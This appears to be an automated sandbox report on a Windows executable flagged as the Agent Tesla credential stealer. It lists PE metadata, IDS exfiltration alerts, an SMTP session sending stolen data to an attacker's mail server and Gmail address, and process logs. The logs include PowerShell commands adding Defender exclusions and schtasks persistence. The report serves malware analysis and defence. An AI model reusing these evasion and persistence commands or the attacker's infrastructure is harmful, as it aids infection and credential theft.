                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K.f..............0..2..........:Q... ...`....@.. ....................................@................................

                                              File Icon

                                              Icon Hash:8a183e06c3aecc5a

                                              Static PE Info

                                              General

                                              Entrypoint:0x4b513a
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x661F4BA4 [Wed Apr 17 04:10:12 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              push ebx
                                              xor edi, dword ptr [eax]
                                              inc edi
                                              inc edx
                                              inc edi
                                              inc ebx
                                              inc edi
                                              xor al, 46h
                                              inc ecx
                                              cmp dword ptr [eax+56h], ecx
                                              add byte ptr [eax], al
                                              push esi
                                              push ebx
                                              xor eax, 46414750h
                                              xor al, 00h
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb50e80x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000x16f0.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xb80000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xb31580xb320027c1e3a81968ab9168e28fd4d647faffFalse0.9375776888520586data7.931627472756141IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xb60000x16f00x18000aa481c6a1848c9f51b7a92dba4a8300False0.7967122395833334data7.178826262537933IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xb80000xc0x2009b6685d0b9a49fede8ec8fb82c504b61False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xb60c80x12e6PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9218685407193055
                                              RT_GROUP_ICON0xb73c00x14data1.05
                                              RT_VERSION0xb73e40x308data0.4213917525773196

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              04/17/24-15:08:20.936584TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49708587192.168.2.10162.222.226.100
                                              04/17/24-15:08:20.936584TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49708587192.168.2.10162.222.226.100
                                              04/17/24-15:08:25.918218TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49710587192.168.2.10162.222.226.100
                                              04/17/24-15:08:25.918218TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49710587192.168.2.10162.222.226.100
                                              04/17/24-15:08:25.918218TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249710587192.168.2.10162.222.226.100
                                              04/17/24-15:08:20.936584TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49708587192.168.2.10162.222.226.100
                                              04/17/24-15:08:25.917883TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49710587192.168.2.10162.222.226.100
                                              04/17/24-15:08:20.936511TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49708587192.168.2.10162.222.226.100
                                              04/17/24-15:08:25.918218TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49710587192.168.2.10162.222.226.100
                                              04/17/24-15:08:25.917883TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49710587192.168.2.10162.222.226.100
                                              04/17/24-15:08:20.936584TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249708587192.168.2.10162.222.226.100
                                              04/17/24-15:08:20.936511TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49708587192.168.2.10162.222.226.100

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 17, 2024 15:08:19.020129919 CEST49708587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:19.182723999 CEST58749708162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:19.185859919 CEST49708587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:19.743056059 CEST58749708162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:19.746567011 CEST49708587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:19.907004118 CEST58749708162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:19.907865047 CEST49708587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:20.068360090 CEST58749708162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:20.069992065 CEST49708587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:20.271915913 CEST58749708162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:20.401052952 CEST58749708162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:20.403983116 CEST49708587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:20.564440966 CEST58749708162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:20.564486027 CEST58749708162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:20.564780951 CEST49708587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:20.765887976 CEST58749708162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:20.775387049 CEST58749708162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:20.775672913 CEST49708587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:20.935698032 CEST58749708162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:20.935909033 CEST58749708162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:20.936511040 CEST49708587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:20.936583996 CEST49708587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:20.936625957 CEST49708587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:20.936625957 CEST49708587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:21.096735954 CEST58749708162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:21.096890926 CEST58749708162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:21.098117113 CEST58749708162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:21.185771942 CEST49708587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:24.204127073 CEST49708587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:24.387124062 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:24.550062895 CEST58749710162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:24.550432920 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:24.902806997 CEST58749710162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:24.903258085 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:25.063210011 CEST58749710162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:25.063673973 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:25.223737001 CEST58749710162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:25.224668026 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:25.386008024 CEST58749710162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:25.386420965 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:25.546331882 CEST58749710162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:25.546534061 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:25.747664928 CEST58749710162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:25.755858898 CEST58749710162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:25.756138086 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:25.915709972 CEST58749710162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:25.915926933 CEST58749710162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:25.917882919 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:25.918217897 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:25.918217897 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:25.918217897 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:08:26.079622030 CEST58749710162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:26.082449913 CEST58749710162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:08:26.127131939 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:10:04.408849955 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:10:04.609529972 CEST58749710162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:10:04.769905090 CEST58749710162.222.226.100192.168.2.10
                                              Apr 17, 2024 15:10:04.770013094 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:10:04.792691946 CEST49710587192.168.2.10162.222.226.100
                                              Apr 17, 2024 15:10:04.952382088 CEST58749710162.222.226.100192.168.2.10

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 17, 2024 15:08:18.736186028 CEST5159053192.168.2.101.1.1.1
                                              Apr 17, 2024 15:08:18.958523035 CEST53515901.1.1.1192.168.2.10

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Apr 17, 2024 15:08:18.736186028 CEST192.168.2.101.1.1.10xba6Standard query (0)mail.thelamalab.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Apr 17, 2024 15:08:18.958523035 CEST1.1.1.1192.168.2.100xba6No error (0)mail.thelamalab.com162.222.226.100A (IP address)IN (0x0001)false

                                              SMTP Packets

                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Apr 17, 2024 15:08:19.743056059 CEST58749708162.222.226.100192.168.2.10220-md-114.webhostbox.net ESMTP Exim 4.96.2 #2 Wed, 17 Apr 2024 18:38:19 +0530
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Apr 17, 2024 15:08:19.746567011 CEST49708587192.168.2.10162.222.226.100EHLO 390120
                                              Apr 17, 2024 15:08:19.907004118 CEST58749708162.222.226.100192.168.2.10250-md-114.webhostbox.net Hello 390120 [81.181.57.52]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPECONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Apr 17, 2024 15:08:19.907865047 CEST49708587192.168.2.10162.222.226.100AUTH login YmlsbGluZ0B0aGVsYW1hbGFiLmNvbQ==
                                              Apr 17, 2024 15:08:20.068360090 CEST58749708162.222.226.100192.168.2.10334 UGFzc3dvcmQ6
                                              Apr 17, 2024 15:08:20.401052952 CEST58749708162.222.226.100192.168.2.10235 Authentication succeeded
                                              Apr 17, 2024 15:08:20.403983116 CEST49708587192.168.2.10162.222.226.100MAIL FROM:<billing@thelamalab.com>
                                              Apr 17, 2024 15:08:20.564486027 CEST58749708162.222.226.100192.168.2.10250 OK
                                              Apr 17, 2024 15:08:20.564780951 CEST49708587192.168.2.10162.222.226.100RCPT TO:<godwingodwin397@gmail.com>
                                              Apr 17, 2024 15:08:20.775387049 CEST58749708162.222.226.100192.168.2.10250 Accepted
                                              Apr 17, 2024 15:08:20.775672913 CEST49708587192.168.2.10162.222.226.100DATA
                                              Apr 17, 2024 15:08:20.935909033 CEST58749708162.222.226.100192.168.2.10354 Enter message, ending with "." on a line by itself
                                              Apr 17, 2024 15:08:20.936625957 CEST49708587192.168.2.10162.222.226.100.
                                              Apr 17, 2024 15:08:21.098117113 CEST58749708162.222.226.100192.168.2.10250 OK id=1rx51Q-0015mQ-2m
                                              Apr 17, 2024 15:08:24.902806997 CEST58749710162.222.226.100192.168.2.10220-md-114.webhostbox.net ESMTP Exim 4.96.2 #2 Wed, 17 Apr 2024 18:38:24 +0530
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Apr 17, 2024 15:08:24.903258085 CEST49710587192.168.2.10162.222.226.100EHLO 390120
                                              Apr 17, 2024 15:08:25.063210011 CEST58749710162.222.226.100192.168.2.10250-md-114.webhostbox.net Hello 390120 [81.181.57.52]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPECONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Apr 17, 2024 15:08:25.063673973 CEST49710587192.168.2.10162.222.226.100AUTH login YmlsbGluZ0B0aGVsYW1hbGFiLmNvbQ==
                                              Apr 17, 2024 15:08:25.223737001 CEST58749710162.222.226.100192.168.2.10334 UGFzc3dvcmQ6
                                              Apr 17, 2024 15:08:25.386008024 CEST58749710162.222.226.100192.168.2.10235 Authentication succeeded
                                              Apr 17, 2024 15:08:25.386420965 CEST49710587192.168.2.10162.222.226.100MAIL FROM:<billing@thelamalab.com>
                                              Apr 17, 2024 15:08:25.546331882 CEST58749710162.222.226.100192.168.2.10250 OK
                                              Apr 17, 2024 15:08:25.546534061 CEST49710587192.168.2.10162.222.226.100RCPT TO:<godwingodwin397@gmail.com>
                                              Apr 17, 2024 15:08:25.755858898 CEST58749710162.222.226.100192.168.2.10250 Accepted
                                              Apr 17, 2024 15:08:25.756138086 CEST49710587192.168.2.10162.222.226.100DATA
                                              Apr 17, 2024 15:08:25.915926933 CEST58749710162.222.226.100192.168.2.10354 Enter message, ending with "." on a line by itself
                                              Apr 17, 2024 15:08:25.918217897 CEST49710587192.168.2.10162.222.226.100.
                                              Apr 17, 2024 15:08:26.082449913 CEST58749710162.222.226.100192.168.2.10250 OK id=1rx51V-0015r7-2i
                                              Apr 17, 2024 15:10:04.408849955 CEST49710587192.168.2.10162.222.226.100QUIT
                                              Apr 17, 2024 15:10:04.769905090 CEST58749710162.222.226.100192.168.2.10221 md-114.webhostbox.net closing connection

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:1
                                              Start time:15:08:11
                                              Start date:17/04/2024
                                              Path:C:\Users\user\Desktop\DOCUMENTS.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\DOCUMENTS.exe"
                                              Imagebase:0x740000
                                              File size:740'864 bytes
                                              MD5 hash:E8CF42736F27344D295F0154E8F51097
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:15:08:15
                                              Start date:17/04/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe"
                                              Imagebase:0x2a0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:15:08:15
                                              Start date:17/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:15:08:15
                                              Start date:17/04/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe"
                                              Imagebase:0x2a0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:15:08:15
                                              Start date:17/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:15:08:15
                                              Start date:17/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp"
                                              Imagebase:0x900000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:15:08:15
                                              Start date:17/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:15:08:16
                                              Start date:17/04/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0x90000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:15:08:16
                                              Start date:17/04/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0xe90000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1395584296.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1395584296.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1395584296.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1395584296.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:15:08:17
                                              Start date:17/04/2024
                                              Path:C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe
                                              Imagebase:0x7d0000
                                              File size:740'864 bytes
                                              MD5 hash:E8CF42736F27344D295F0154E8F51097
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.1418243148.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.1418243148.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 45%, ReversingLabs
                                              • Detection: 36%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:15:08:18
                                              Start date:17/04/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff6616b0000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:16
                                              Start time:15:08:22
                                              Start date:17/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp"
                                              Imagebase:0x900000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:17
                                              Start time:15:08:22
                                              Start date:17/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:18
                                              Start time:15:08:22
                                              Start date:17/04/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0x770000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2533846228.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2533846228.0000000002B26000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2533846228.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2533846228.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:11.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:5.1%
                                                Total number of Nodes:257
                                                Total number of Limit Nodes:10
